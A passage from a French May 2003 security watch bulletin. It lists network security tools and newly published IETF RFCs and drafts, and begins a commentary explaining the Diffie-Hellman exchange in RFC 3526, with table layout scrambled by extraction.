19990818
2.6
2.0.0
1.8
Date
Source
18/08/99
10/10/02
14/04/03
30/04/03
http://all.net/dtk/index.html
http://ciac.llnl.gov/cstc/nid/nid.html
http://www.snort.org/dl/
http://www.nswc.navy.mil/ISSEC/CID/
GENERATEURS DE TEST
Nom
Fonction
Ver.
Elza
FireWalk
IPSend
IDSWakeUp
UdpProbe
Requêtes HTTP
Analyse filtres
Paquets IP
Paquets UDP
1.4.5
5.0
2.1a
1.0
1.2
Date
Source
01/04/00
20/10/02
19/09/97
13/10/00
13/02/96
http://www.stoev.org/elza/project-news.html
http://www.packetfactory.net/firewalk
ftp://coombs.anu.edu.au/pub/net/misc
http://www.hsc.fr/ressources/outils/idswakeup/download/
http://sites.inka.de/sites/bigred/sw/udpprobe.txt
PARE-FEUX
Nom
Fonction
Ver.
DrawBridge
IpFilter
PareFeu FreeBsd
Filtre datagramme
3.1
3.4.31
Date
Source
19/04/00 http://drawbridge.tamu.edu
07/12/02 http://coombs.anu.edu.au/ipfilter/ip-filter.html
TUNNELS
Nom
Fonction
Ver.
Date
Source
CIPE
FreeSwan
http-tunnel
OpenSSL
OpenSSH
Stunnel
TeraTerm Pro
Zebedee
Pile Crypto IP (CIPE)
Pile IPSec
Encapsulation http
Pile SSL
Pile SSH 1 et 2
Proxy https
Terminal SSH2
Tunnel TCP/UDP
1.5.4
2.00
3.0.5
0.9.7b
3.6.1
4.04
3.1.3
2.4.1
29/06/01
28/04/03
06/12/00
10/04/03
01/04/03
12/01/03
08/10/02
29/05/02
http://sites.inka.de/sites/bigred/devel/cipe.html
http://www.freeswan.org
http://www.nocrew.org/software/httptunnel.html
http://www.openssl.org/
http://www.openssh.com/
http://www.stunnel.org
http://www.ayera.com/teraterm/
http://www.winton.org.uk/zebedee/
Page 22/65
Mai 2003
NO
OR
RM
ME
ES
SE
ET
T ST
TA
AN
ND
DA
AR
RD
DS
S
LES
LES
PUBLICATIONS DE L’IETF
RFC
Du 24/04/2003 au 28/05/2003, 16 RFC ont été publiés dont 1 RFC ayant trait à la
sécurité.
RFC TRAITANT DE LA SECURITE
Thème
IKE
Num Date Etat Titre
3526
05/03 Pst
More Modular Exponential (MODP) Diffie-Hellman groups for Internet Key Exchange (IKE)
RFC TRAITANT DE DOMAINES CONNEXES A LA SECURITE
Thème
Num Date Etat Titre
NFS
3530
04/03 Pst
Network File System (NFS) version 4 Protocol
AUTRES RFC
Thème
APEX
BEEP
DHCP
IETF
IPV6
MEDIA
NET
OGG
SLP
TCP
URN
LES
Num Date Etat Titre
3343
3529
3527
3535
3536
3316
3531
3524
3532
3533
3534
3528
3522
3541
04/03
04/03
04/03
05/03
05/03
04/03
04/03
04/03
05/03
05/03
05/03
04/03
04/03
05/03
Exp
Exp
Pst
Inf
Inf
Inf
Inf
Pst
Inf
Inf
Pst
Exp
Exp
Inf
The Application Exchange (APEX) Presence Service
Using XML-RPC in Blocks Extensible Exchange Protocol (BEEP)
Link Selection sub-option for the Relay Agent Information Option for DHCPv4
Overview of the 2002 IAB Network Management Workshop
Terminology Used in Internationalization in the IETF
Internet Protocol Version 6 (IPv6) for Some Second and Third Generation Cellular Hosts
A Flexible Method for Managing the Assignment of Bits of an IPv6 Address Block
Mapping of Media Streams to Resource Reservation Flows
Requirements for the Dynamic Partitioning of Switching Elements
The Ogg Encapsulation Format Version 0
The application/ogg Media Type
Mesh-enhanced Service Location Protocol (mSLP)
The Eifel Detection Algorithm for TCP
A Uniform Resource Name (URN) Namespace for the Web3D Consortium (Web3D)
DRAFTS
Du 24/04/2003au 28/05/2003, 271 drafts ont été publiés: 192 drafts mis à jour, 79
nouveaux drafts, dont 11 drafts ayant directement trait à la sécurité.
NOUVEAUX DRAFTS TRAITANT DE LA SECURITE
Thème
Nom du Draft
Date Titre
AUTH
IPSEC
draft-iab-auth-mech-00
draft-goswami-ipsec-espll-00
draft-guichard-ce-ce-ipsec-00
draft-ietf-ipsec-ikev2-algorithms-00
draft-kempf-abk-nd-00
draft-ietf-msec-tgsakmp-00
draft-ietf-krb-wg-kerberos-set-passwd-00
draft-mohanp-pana-ipsec-00
draft-ietf-sasl-rfc2222bis-00
Draft-umschaden-smime-midc-sip-proxy-00
draft-ietf-smime-cms-rsa-kem-00
28/04
05/05
02/05
19/05
07/05
20/05
06/05
13/05
20/05
06/05
19/05
IPV6
ISAKMP
KRB
PANA
SASL
SIP
SMIME
A Survey of Authentication Mechanisms
Encapsulating Security Payload for Link Layers (ESPLL)
CE-CE IPSec within an RFC-2547 Network
Cryptographic Algorithms for use in the Internet Key Exchange V2
Securing IPv6 Neighbor Discovery Using Address Based Keys
Tunneled Group Secure Association Key Management Protocol
Kerberos Set/Change Password: Version 2
Securing the first hop in PANA using IPsec
Simple Authentication and Security Layer (SASL)
End-to-end Security for Firewall/NAT Traversal within SIP
Use of the RSA-KEM Key Transport Algorithm in CMS
MISE A JOUR DE DRAFTS TRAITANT DE LA SECURITE
Thème
Nom du Draft
Date Titre
AAA
draft-perkins-aaav6-06
draft-irtf-aaaarch-handoff-02
draft-ietf-eap-rfc2284bis-03
draft-ietf-ipsec-ciph-aes-cbc-05
draft-ietf-ipseckey-rr-01
09/05
21/05
16/05
02/05
29/04
EAP
IPSEC
AAA for IPv6 Network Access
Experimental Handoff Extension to RADIUS
Extensible Authentication Protocol (EAP)
The AES Cipher Algorithms and Their Use With IPsec
A method for storing IPsec keying material in DNS
Page 23/65
Mai 2003
MOBILEIP
MSEC
NFSV4
OTP
PANA
PKIX
RADIUS
RTP
SASL
SMIME
SSH
XMPP
draft-ietf-ipsp-ipsecpib-08
draft-hoffman-ipsec-algorithms-02
draft-ietf-mobileip-aaa-key-12
draft-ietf-msec-arch-01
draft-ietf-nfsv4-ccm-01
draft-nesser-otp-sha-256-384-512-02
draft-ietf-pana-threats-eval-04
draft-ietf-pkix-proxy-06
draft-ietf-pkix-ipki-new-rfc2527-02
draft-chiba-radius-dynamic-authorization-20
draft-aboba-radius-rfc2869bis-22
draft-ietf-avt-srtp-06
draft-ietf-sasl-anon-01
draft-ietf-sasl-plain-01
draft-ietf-sasl-saslprep-01
draft-ietf-smime-examples-10
draft-ietf-smime-x400transport-07
draft-ietf-smime-x400wrap-06
draft-ietf-smime-pss-01
draft-ietf-secsh-auth-kbdinteract-05
draft-ietf-xmpp-e2e-03
19/05
16/05
21/05
08/05
19/05
05/05
19/05
09/05
25/04
16/05
16/05
30/04
05/05
05/05
05/05
28/04
12/05
01/05
30/04
29/04
21/05
IPSec Policy Information Base
Security Algorithms for IKEv2
AAA Registration Keys for Mobile IP
The Multicast Security (MSEC) Architecture
The Channel Conjunction Mechanism (CCM) for GSS
One-Time Passwords with SHA-256, SHA-384, SHA-512
PANA Threat Analysis and security requirements
Internet X.509 PKI Proxy Certificate Profile
Internet X.509 PKI Certificate Policy & Certif. Practices Framework
Dynamic Authorization Extensions to RADIUS
RADIUS Support For Extensible Authentication Protocol (EAP)
The Secure Real-time Transport Protocol
The Anonymous SASL Mechanism
The Plain SASL Mechanism
SASLprep: Stringprep profile for user names and passwords
Examples of S/MIME Messages
Transporting S/MIME Objects in X.400
Securing X.400 Content with S/MIME
Use of the PSS Signature Algorithm in CMS
Generic Message Exchange Authentication For SSH
End-to-End Object Encryption in XMPP
DRAFTS TRAITANT DE DOMAINES CONNEXES A LA SECURITE
Thème
Nom du Draft
Date Titre
AAA
draft-ietf-aaa-diameter-mobileip-14
draft-hakala-aaa-diameter-cc-00
draft-ietf-bmwg-mcastm-12
draft-ietf-bmwg-dsmterm-06
draft-ietf-bmwg-ospfconv-term-04
draft-ietf-bmwg-ospfconv-intraarea-05
draft-ietf-bmwg-ospfconv-applicability-03
draft-kimura-protection-term-01
draft-joslin-config-schema-06
draft-moskowitz-hip-06
draft-moskowitz-hip-arch-03
draft-sheng-isis-bgp-mpls-vpn-00
draft-galtzur-l2tpext-gr-00
draft-ietf-ldapbis-dn-10
draft-ietf-ldapbis-user-schema-05
draft-zeilenga-ldap-grouping-06
draft-zeilenga-ldap-txn-06
draft-zeilenga-ldap-cancel-08
draft-zeilenga-ldap-t-f-05
draft-zeilenga-ldap-noop-01
draft-klasen-ldap-facs-tel-number-match-01
draft-zeilenga-ldapbis-strprep-00
draft-apurva-ldap-query-containment-00
draft-zeilenga-ldap-assert-00
draft-zeilenga-ldap-uuid-00
draft-ietf-ldup-lcup-05
draft-zeilenga-ldup-sync-02
draft-zeilenga-ldup-harmful-00
draft-ietf-policy-qos-info-model-05
draft-pitta-redundant-fault-tol-conf-00
draft-ietf-ccamp-tracereq-02
draft-ietf-ppvpn-bgpvpn-auto-05
draft-ietf-ppvpn-vpn-vr-04
29/04
06/05
05/05
02/05
22/05
22/05
22/05
25/04
01/05
15/05
07/05
13/05
20/05
05/05
01/05
05/05
05/05
05/05
05/05
05/05
14/05
05/05
06/05
12/05
12/05
29/04
06/05
05/05
06/05
05/05
14/05
13/05
05/05
BENCH
CONFIG
HIP
ISIS
L2TP
LDAP
LDUP
POLICY
REDUND
TRACE
VPN
Diameter Mobile IPv4 Application
Diameter Credit-control Application
Methodology for IP Multicast Benchmarking
Benchmarking Network-layer Traffic Control Mechanisms
OSPF Benchmarking Terminology and Concepts
Benchmarking Methodology for Basic OSPF Convergence
Benchmarking Applicability for Basic OSPF Convergence
Benchmarking Terminology for Protection Performance
A Configuration Schema for LDAP Based Directory User Agents
Host Identity Protocol
Host Identity Protocol Architecture
ISIS as the PE/CE Protocol in BGP/MPLS VPNs
Layer Two Tunneling Protocol (Version 3) Graceful Restart
LDAP:String Representation of Distinguished Names
LDAP: User Schema
LDAPv3: Grouping of Related Operations
LDAPv3 Transactions
LDAP Cancel Extended Operation
LDAP Absolute True and False Filters
The LDAP No-Op Control
LDAP: matching rules for facsimile telephone numbers
LDAP: Internationalized String Preparation
Schema to Support Query Containment in LDAP Directories
The LDAP Assertion Control
The LDAP entryUUID operational attribute
LDAP Client Update Protocol
LDAP Content Synchronization Operation
LDAP Multi-master Replication Considered Harmful
Policy QoS Information Model
Redundant Fault Tolerant Configurations
Tracing Requirements for Generic Tunnels
BGP as Auto-Discovery Mechanism for Provider-provisioned VPNs
Network based IP VPN Architecture using Virtual Routers
AUTRES DRAFTS
Thème
Nom du Draft
Date Titre
ASAP
draft-ietf-rserpool-asap-07
draft-ietf-rserpool-common-param-04
draft-dickel-ascertech-base-01
draft-ietf-bgmp-spec-04
draft-ietf-ptomaine-nopeer-03
draft-ietf-idr-bgp-analysis-03
draft-lonnfors-simple-binpidf-01
draft-ietf-impp-im-03
draft-ietf-impp-pres-03
draft-ietf-crisp-requirements-05
draft-ietf-dccp-ccid2-02
draft-ietf-dccp-ccid3-02
draft-ietf-dccp-spec-03
draft-ietf-dhc-isnsoption-06
16/05
16/05
02/05
21/05
13/05
13/05
08/05
20/05
20/05
12/05
12/05
12/05
20/05
06/05
ASCERTE
BGMP
BGP4
BINPIDF
CPIM
CPP
CRISP
DCCP
DHCP
Aggregate Server Access Protocol (ASAP)
Aggregate Server Access Protocol & Endpoint Name Resolution
Ascertech's Billing & Accounting System Exchange Protocol
Border Gateway Multicast Protocol (BGMP): Protocol Specification
NOPEER community for BGP route scope control
BGP-4 Protocol Analysis
External Object Extension to Presence Information Data Format
Common Profile for Instant Messaging (CPIM)
Common Profile for Presence (CPP)
Cross Registry Internet Service Protocol (CRISP) Requirements
DCCP Congestion Control ID 2:TCP-like Congestion Control
DCCP Congestion Control ID 3:TFRC Congestion Control
Datagram Congestion Control Protocol (DCCP)
The IPv4 DHCP Options for the Internet Storage Name Service
Page 24/65
Mai 2003
DMA
DMIB
DNS
DOI
DSP
E164
ECMP
ENRP
ENUM
EPP
EXTREME
FCS
FIRS
GDOI
GEOPRIV
GSTN
I18N
IEPREP
IETF
IGMP
IMAP
IMP
IP
IPCDN
IPO
IPR
IPV6
IRC
LDAP
LWAPP
MAIL
MBONED
MDN
MEGACO
MIB
draft-ietf-dhc-extended-optioncodes-00
draft-callaghan-rpcrdma-00
draft-ietf-disman-alarm-mib-12
draft-ietf-dnsext-mdns-20
draft-ietf-dnsext-delegation-signer-14
draft-ietf-dnsext-insensitive-03
Draft-ietf-dnsext-dnssec-2535type-change-00
draft-josefsson-dns-url-08
draft-main-addr-dns-rep-00
draft-paskin-doi-uri-03
draft-rajeshkumar-mmusic-gpmd-03
draft-foster-e164-gstn-npusa-06
draft-bhatia-ecmp-routes-in-bgp-00
draft-ietf-rserpool-enrp-06
draft-ietf-enum-rfc2916bis-06
draft-zygmuntowicz-epp-pltld-00
draft-hollenbeck-epp-rgp-00
draft-shah-extreme-eaps-03
draft-canessa-fcs-api-00
draft-ietf-crisp-firs-arch-00
draft-ietf-crisp-firs-core-00
draft-ietf-crisp-firs-dns-00
draft-ietf-crisp-firs-dnsrr-00
draft-ietf-crisp-firs-contact-00
draft-ietf-crisp-firs-ipv4-00
draft-ietf-crisp-firs-ipv6-00
draft-ietf-crisp-firs-asn-00
draft-ietf-msec-gdoi-08
draft-ietf-geopriv-dhcp-lci-option-00
draft-allocchio-gstn-05
draft-newman-i18n-comparator-00
draft-ietf-ieprep-ets-telephony-04
draft-polk-ieprep-flow-model-consideration-01
draft-ietf-ipr-technology-rights-06
draft-ietf-ipr-template-00
draft-ietf-nomcom-rfc2727bis-04
draft-mrose-ietf-posting-03
draft-carpenter-solution-sirs-00
draft-ietf-problem-issue-statement-01
draft-ietf-problem-process-00
draft-ietf-magma-snoop-07
draft-ietf-imapext-sort-13
draft-ietf-imapext-annotate-07
draft-ietf-imapext-i18n-00
draft-daboo-imap-annotatemore-03
draft-ietf-impp-srv-03
draft-ietf-forces-requirements-09
draft-ietf-ipoib-ip-over-infiniband-04
draft-eastlake-ip-mime-08
draft-clausen-ipdvb-enc-01
draft-main-ipaddr-text-rep-00
draft-syam-ip-state-model-00
draft-ietf-ipcdn-pktc-mtamib-01
draft-ietf-ipo-impairments-05
draft-savola-ipr-lastcall-01
draft-ietf-multi6-multihoming-requ-06
draft-ogura-ipv6-mapos-02
draft-desanti-ipv6-over-fibre-channel-01
draft-hain-ipv6-sitelocal-01
draft-savola-multi6-nowwhat-00
draft-hinden-ipv6-global-local-addr-00
draft-brocklesby-irc-isupport-02
draft-legg-ldap-gser-abnf-06
draft-legg-ldap-gser-03
draft-calhoun-seamoby-lwapp-01
draft-bajaj-mail-srv-00
draft-savola-mboned-mcast-rpaddr-03
draft-vaudreuil-mdnbis-04
draft-ietf-megaco-mib-05
draft-schwarz-megaco-relay-services-01
draft-ietf-adslmib-vdsl-09
draft-ietf-atommib-atm2-19
draft-ietf-atommib-rfc2496bis-02
draft-ietf-atommib-rfc2495bis-02
draft-ietf-entmib-v3-01
draft-ietf-hubmib-power-ethernet-mib-05
draft-ietf-hubmib-1643-to-historic-01
19/05
15/05
29/04
21/05
06/05
30/04
15/05
21/05
13/05
08/05
20/05
08/05
14/05
16/05
13/05
13/05
19/05
16/05
21/05
19/05
19/05
19/05
19/05
19/05
19/05
19/05
19/05
08/05
12/05
30/04
12/05
28/04
16/05
20/05
06/05
09/05
12/05
07/05
12/05
12/05
06/05
15/05
20/05
12/05
20/05
20/05
21/05
01/05
07/05
20/05
02/05
14/05
09/05
08/05
09/05
16/05
25/04
01/05
12/05
25/04
08/05
13/05
07/05
07/05
05/05
08/05
22/05
12/05
29/04
12/05
01/05
14/05
06/05
06/05
12/05
22/05
04/05
Extending DHCP Options Codes
RDMA Transport for ONC RPC
Alarm MIB
Linklocal Multicast Name Resolution (LLMNR)
Delegation Signer Resource Record
Domain Name System (DNS) Case Insensitivity Clarification
Legacy Resolver Compatibility for Delegation Signer
Domain Name System Uniform Resource Identifiers
Mapping Network Addresseses into Domain Name Space
The 'doi' URI Scheme for Digital Object Identifier (DOI)
SDP attribute for qualifying Media Formats with Generic Param.
Number Portability Administration in the U.S.
Advertising Equal Cost Multi-Path (ECMP) routes in BGP
Enpoint Name Resolution Protocol (ENRP)
The E.164 to URI DDDS Application (ENUM)
EPP parameters for .pl ccTLD
Redemption Grace Period Mapping for the EPP
Extreme Networks'Ethernet Automatic Protection Switching V 1
Fixed Content Storage (FCS) Application Programming Interface
Federated Internet Registry Service: Arch. & Implement. Guide
Federated Internet Registry Service: Core Elements
Defining & Locating DNS Domains in the FIRS
Defining & Locating DNS Resource Records in the FIRS
Defining & Locating Contact Information in the FIRS
Defining & Locating IPv4 Address Blocks in the FIRS
Defining & Locating IPv6 Address Blocks in the FIRS
Defining & Locating Autonomous System Numbers in the FIRS
The Group Domain of Interpretation
Location Configuration Information for GEOPRIV
Text string notation for Dial Sequences & GSTN / E.164 addresses
Internet Application Protocol Comparator Registry
IP Telephony Requirements for ETS
Considerations for IEPREP Related Protocol Packet Flow Models
Intellectual Property Rights in IETF Technology
A Template for IETF Patent Disclosures and Licensing Declarations
IAB & IESG Selection, Confirmation, and Recall Process …
A Practice for Revoking Posting Rights to IETF mailing lists
Careful Additional Review of Documents (CARD)by Senior IETF
IETF Problem Statement
IETF Problem Resolution Processes
Considerations for IGMP and MLD Snooping Switches
IMAP - SORT AND THREAD EXTENSION
IMAP ANNOTATE Extension
Internet Message Access Protocol Internationalization
IMAP ANNOTATEMORE Extension
Address Resolution for Instant Messaging and Presence
Requirements for Separation of IP Control and Forwarding
IP encapsulation and address resolution over InfiniBand networks
IP over MIME
Simple Encapsulation for trans. of IP datag. over MPEG-2/DVB
Textual Representation of IPv4 and IPv6 Addresses
State Model for IP Interfaces
MTA MIB for PacketCable 1.0 compliant devices
Impairments And Other Constraints On Optical Layer Routing
Intellectual Property Rights Considerations in Last Calls
Goals for IPv6 Site-Multihoming Architectures
IP Version 6 over MAPOS
IPv6 over Fibre Channel
Local Scope Address Requirements
IPv6 Site Multihoming: Now What?
Globally Unique IPv6 Local Unicast Addresses
IRC RPL_ISUPPORT Numeric Definition
Common Elements of GSER Encodings
Generic String Encoding Rules for ASN.1 Types
Light Weight Access Point Protocol (LWAPP)
Use of SRV records for POP3, POP3S, IMAP and IMAPS.
Embedding the Address of RP in IPv6 Multicast Address
Message Disposition Notification
Megaco MIB
Voiceband Data Transport Services in Megaco/H.248 Networks
Definitions of Managed Objects for VDSL
Definitions of Supplemental Managed Objects for ATM Interface
Definitions of Managed Objects for the DS3/E3 Interface Type
Definitions of Managed Objects for the DS1, E1, DS2, E2 Interface
Entity MIB (Version 3)
Power Ethernet MIB
Applicabil. Stat. for Reclassification of RFC 1643 to Historic Status
Page 25/65
Mai 2003
draft-ietf-ips-fcip-mib-04
draft-ietf-midcom-semantics-02
draft-gentric-mmusic-stream-switching-req-00
draft-sjkoh-mobile-sctp-mobileip-01
draft-daley-mobileip-movedetect-01
draft-ietf-mobileip-reg-revok-07
draft-nomad-mobileip-filters-03
draft-bharatia-mobileip-gen-mipv4-ext-01
draft-jung-mobileip-fastho-hmipv6-00
MPLS
draft-ietf-ccamp-gmpls-architecture-07
draft-ietf-ccamp-gmpls-recovery-termino.-02
draft-ietf-mpls-ldp-mib-10
draft-ietf-mpls-ftn-mib-06
draft-ietf-mpls-mgmt-overview-04
draft-ietf-mpls-nodeid-subobject-01
draft-ietf-mpls-telink-mib-02
draft-martini-l2circuit-trans-mpls-11
draft-martini-l2circuit-encap-mpls-05
draft-zhang-mpls-interas-te-req-03
draft-zamfir-explicit-resource-control-bund-01
draft-lai-mpls-mib-rqmts-00
draft-raggarwa-mpls-p2mp-te-00
MRCP
draft-shanmugham-mrcp-04
MSDP
draft-ietf-msdp-spec-19
MSGHEAD draft-newman-msgheader-originfo-05
MTP3
draft-anshoo-test-spec-m3ua-01
MUPDATE draft-siemborski-mupdate-04
NAROS
draft-de-launois-multi6-naros-00
NAT
draft-park-scalable-multi-natpt-00
NCS
draft-ietf-ipcdn-pktc-signaling-01
NEMO
draft-ietf-nemo-requirements-01
draft-ietf-nemo-terminology-00
NFS
draft-callaghan-nfsdirect-00
NFSV4
draft-ietf-nfsv4-rfc1832bis-01
draft-ietf-nfsv4-secinfo-00
draft-ietf-nfsv4-rpc-iana-00
draft-ietf-nfsv4-rfc1831bis-00
draft-talpey-nfsv4-rdma-sess-00
NNTP
draft-ietf-nntpext-base-18
OLSR
draft-ietf-manet-olsr-10
OPS
draft-ietf-ops-ipv6-flowlabel-01
OSPF
draft-lindem-ospf-cap-00
draft-udo-ospf-vendatt-00
draft-ietf-ospf-scalability-04
OWAMP
draft-ietf-ippm-owdp-06
PANA
draft-ietf-pana-usage-scenarios-06
PIDF
draft-ietf-impp-cpim-pidf-08
POLICY
draft-ietf-policy-qos-device-info-model-09
PPP
draft-kehn-info-ppp-ipcp-ext-00
draft-schryver-pppext-iana-00
PROVREG draft-ietf-provreg-epp-ext-02
RDMA
draft-hilland-rddp-verbs-00
RMON
draft-ietf-rmonmib-framework-04
RMT
draft-ietf-rmt-bb-fec-supp-compact-01
ROHC
draft-price-rohc-sigcomp-user-guide-02
draft-price-rohc-sigcomp-torture-tests-02
ROC
draft-ietf-rohc-sigcomp-impl-guide-00
RPSEC
draft-ietf-rpsec-routing-threats-01
RPSLNG
draft-blunk-rpslng-00
RSVP
draft-lang-ccamp-gmpls-recovery-e2e-sig-01
draft-dimitri-ccamp-gmpls-rsvp-te-ason-00
RTP
draft-ietf-avt-rtcp-feedback-06
draft-ietf-avt-mwpp-midi-rtp-07
draft-ietf-avt-rtcp-report-extns-06
SCTP
draft-stewart-tsvwg-prsctp-04
draft-stewart-tsvwg-sctpscore-01
draft-ahmed-lssctp-00
SDP
draft-ietf-mmusic-sdp-srcfilter-05
draft-ietf-mmusic-sdp-new-13
draft-ietf-mmusic-sdp4nat-04
draft-ietf-mmusic-sdpng-trans-04
draft-ietf-mmusic-sdp-bwparam-02
SDXP
draft-wildgrube-gnp-04
SEAMOBY draft-ietf-seamoby-mobility-terminology-04
SERVICE
draft-iab-service-id-considerations-01
SIEVE
draft-showalter-sieve-vacation-05
SIGTRAN draft-ietf-sigtran-rfc3057bis-00
MIDCOM
MMUSIC
MOBILEIP
29/04
15/05
16/05
21/05
09/05
22/05
25/04
15/05
14/05
19/05
09/05
01/05
01/05
28/04
19/05
22/05
28/04
28/04
14/05
09/05
30/04
06/05
01/05
22/05
28/05
14/05
15/05
15/05
15/05
08/05
15/05
16/05
15/05
07/05
09/05
20/05
20/05
15/05
25/04
12/05
22/05
15/05
22/05
19/05
20/05
29/04
09/05
19/05
12/05
19/05
13/05
28/04
19/05
14/05
15/05
16/05
15/05
06/05
08/05
09/05
28/04
05/05
20/05
21/05
19/05
06/05
29/04
16/05
22/05
21/05
15/05
14/05
02/05
25/04
12/05
13/05
15/05
Definition of Managed Objects for FCIP
MIDCOM Protocol Semantics
Requirements and Use Cases for Stream Switching
mSCTP with Mobile IP for IP Mobility Support
Movement Detection Optimization in Mobile IPv6
Registration Revocation in Mobile IPv4
Filters for Mobile IPv4 Bindings (NOMADv4)
Mobile IPv4 Extension for Configuration Options Exchange
Fast Handover for Hierarchical MIPv6 (F-HMIPv6)
Generalized Multi-Protocol Label Switching Architecture
Recovery (Protection and Restoration) Terminology for GMPLS
Definitions of Managed Objects for The MPLT LD Protocol
MPLS Forward Equivalency Class-To-Next Hop Label Forwarding …
Multiprotocol Label Switching (MPLS) Management Overview
Definition of an RRO node-id subobject
Traffic Engineering Link Management Information Base
Transport of Layer 2 Frames Over MPLS
Encapsulation Methods for Transport of L2 Frames Over IP & MPLS
MPLS Inter-AS Traffic Engineering requirements
Explicit Resource Control over GMPLS Link Bundles
Network Management Requirements for MPLS MIBs
Establishing Point to Multipoint MPLS TE LSPs
A Media Resource Control Protocol …
Multicast Source Discovery Protocol (MSDP)
Originator-Info Message Header
Test Specification for MTP3 User Adaptation
The MUPDATE Distributed Mailbox Database Protocol
NAROS : Host-Centric IPv6 Multihoming with Traffic Engineering
Scalable mNAT-PT Solution
NCS Signaling MIB for PacketCable/IPCablecom MTAs
Network Mobility Support Goals and Requirements
Network Mobility Support Terminology
NFS Direct Data Placement
XDR: External Data Representation Standard
NFSv4.1: SECINFO Changes
RPC Numbering Authority Transfer to IANA
RPC: Remote Procedure Call Protocol Specification Version 2
NFSv4 RDMA and Session Extensions
Network News Transport Protocol
Optimized Link State Routing Protocol
Textual Conventions for IPv6 Flow Label
Extensions to OSPF for Advertising Optional Router Capabilities
OSPF TE LSA Ext. in Support of Vendor/Org. Specific Attributes
Prioritized Treatment of Specific OSPF Packets & Cong. Avoidance
A One-way Active Measurement Protocol (OWAMP)
Problem Statement and Usage Scenarios for PANA
Presence Information Data Format (PIDF)
Info. Model for Describing Net. Device QoS Datapath Mechanisms
PPP Internet Protocol Control Protocol Ext for Route Table Entries
IANA Considerations for PPP
Guidelines for Extending the Extensible Provisioning Protocol
RDMA Protocol Verbs Specification
Introduction to the RMON Family of MIB Modules
Compact Forward Error Correction (FEC) Schemes
SigComp User Guide
SigComp Torture Tests
Implementer's Guide for SigComp
Generic Threats to Routing Protocols
RPSLng
RSVP-TE Ext. in support of End-to-End GMPLS-based Recovery
GMPLS RSVP-TE Signalling in support of ASON
Extended RTP Profile for RTCP-based Feedback(RTP/AVPF)
RTP Payload Format for MIDI
RTP Control Protocol Extended Reports (RTCP XR)
SCTP Partial Reliability Extension
Stream Control Transmission Protocol (SCTP) Bakeoff Scoring
Load Sharing in Stream Control Transmission Protocol
Session Description Protocol (SDP) Source Filters
SDP: Session Description Protocol
RTCP attribute in SDP
SDPng Transition
A Transport Independent Bandwidth Modifier for SDP
SDXP: Structured Data Exchange Protocol
Mobility Related Terminology
On the use of a Service Identifier in Packet Headers
Sieve: Vacation Extension
ISDN Q.921-User Adaptation Layer
Page 26/65
Mai 2003
SIMPLE
SIP
SLP
SMS
SMTP
SNMPV3
SPAM
SPEECHS
SSM
TCP
TFTP
ULE
URN
VPN
VRRP
WEBDAV
XMPP
draft-lonnfors-simple-partial-notify-01
draft-khartabil-simple-filter-format-00
draft-khartabil-simple-filter-funct-00
draft-ietf-simple-presinfo-deliv-reg-00
draft-ietf-simple-winfo-filter-reqs-00
draft-ietf-simple-event-list-03
draft-ietf-sip-scvrtdisco-04
draft-ietf-sipping-req-history-03
draft-ietf-sipping-conferencing-framework-00
draft-zhao-slp-attr-02
draft-wilde-sms-service-04
draft-wilde-sms-uri-04
draft-ietf-fax-esmtp-conneg-07
draft-ietf-snmpv3-coex-v2-04
draft-crocker-spam-techconsider-01
draft-fecyk-dsprotocol-02
draft-shanmugham-speechsc-00
draft-ietf-ssm-overview-05
draft-ietf-ssm-arch-03
draft-floyd-newreno-00
draft-lear-tftp-uri-04
draft-fair-ipdvb-ule-00
draft-allen-newsml-urn-rfc3085bis-00
draft-rosen-ppvpn-l2-signaling-03
draft-kompella-ppvpn-vpls-02
draft-andersson-ppvpn-terminology-03
draft-sodder-ppvpn-vhls-02
draft-ietf-ppvpn-l2vpn-requirements-00
draft-ietf-vrrp-spec-v2-07
draft-ietf-vrrp-ipv6-spec-04
draft-ietf-webdav-ordering-protocol-08
draft-ietf-xmpp-im-11
draft-ietf-xmpp-core-12
20/05
20/05
20/05
06/05
09/05
19/05
14/05
15/05
01/05
28/04
15/05
15/05
19/05
06/05
19/05
28/04
22/05
01/05
08/05
12/05
16/05
20/05
21/05
06/05
15/05
30/04
29/04
02/05
21/05
21/05
12/05
05/05
05/05
Partial Notification of Presence Information
XML Based Format for Event Notification Filtering
Functional Description of Event Notification Filtering
Requirements for Efficient Delivery of Presence Information
Requirements for Filtering of Watcher Information
A SIP Event Notification Extension for Resource Lists
SIP Ext. Header Field for Service Route Discovery During Registr.
SIP Generic Request History Capability – Requirements
A Framework for Conferencing with the Session Initiation Protocol
Enabling Global Service Attributes in the Service Location Protocol
Registration of GSTN SMS Service Qualifier
URI scheme for GSM Short Message Service
SMTP Service Extension for Fax Content Negotiation
Coexistence between V1, V2 & V3 of the Internet SNM Framework
Technical Considerations for Spam Control Mechanisms
A Way to Identify Hosts Authorized to Send SMTP Traffic
A SPEECHSC protocol for Media Resource Control
An Overview of Source-Specific Multicast(SSM)
Source-Specific Multicast for IP
The NewReno Modification to TCP's Fast Recovery Algorithm
URI Scheme for the TFTP Protocol
ULE for transmission of IP datagrams over MPEG-2/DVB networks
URN Namespace for NewsML Resources
Provisioning Models and Endpoint Identifiers in L2VPN Signaling
Virtual Private LAN Service
PPVPN Terminology
Virtual Hierarchical LAN Services
Service Reqs for L2 Provider Provisioned Virtual Private Networks
Virtual Router Redundancy Protocol
Virtual Router Redundancy Protocol for IPv6
WebDAV Ordered Collections Protocol
XMPP Instant Messaging
XMPP Core
Page 27/65
Mai 2003
NOS COMMENTAIRES
LES RFC
RFC 3526
More Modular Exponential (MODP) Diffie-Hellman groups for Internet Key Exchange (IKE)
Les standards RFC2412 (‘The OAKLEY Key Determination Protocol’) et RFC2409 (‘The Internet Key
Exchange’) décrivent les mécanismes permettant à deux entités d’établir un secret commun sur un support non
protégé, et ce à partir de la seule connaissance de paramètres caractéristiques des schémas d’échange employés, les
valeurs de ces paramètres pouvant être rendues publiques.
Parmi les schémas proposés, le schéma ‘Diffie-Hellman’ ou ‘DH’, synthétiquement présenté sur le diagramme
d’échange suivant, permet d’assurer une ‘mise à la clef’ à partir de la seule connaissance d’un couple de
paramètres : ‘n’ un nombre premier et ‘g’ un générateur de ‘n’.
1- Alice et Bob conviennent du choix du couple
(n,g)
en
respectant
certaines
conditions
mathématiques
2- Alice sélectionne une valeur secrète ‘a’
et
calcule sa clef publique A=gamod(n)
3- Bob sélectionne sa valeur secrète ‘b’ et calcule
aussi sa clef publique B=gbmod(n)
4- Alice et Bob échangent leur clef publique sur un
quelconque canal
5- Alice calcule le secret partagé ‘K’ en effectuant
l’opération K= Ba = gbamod(n)
6- Bob calcule lui aussi le secret partagé ‘K’ en
